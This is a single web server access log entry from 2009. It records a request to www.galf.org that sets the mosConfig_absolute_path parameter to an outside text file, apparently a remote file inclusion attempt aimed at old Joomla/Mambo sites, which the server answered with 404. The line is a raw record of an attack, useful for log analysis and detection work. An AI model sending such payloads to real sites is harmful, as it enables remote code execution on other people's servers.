219.85.63.226 - - [07/Sep/2009:00:13:10 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
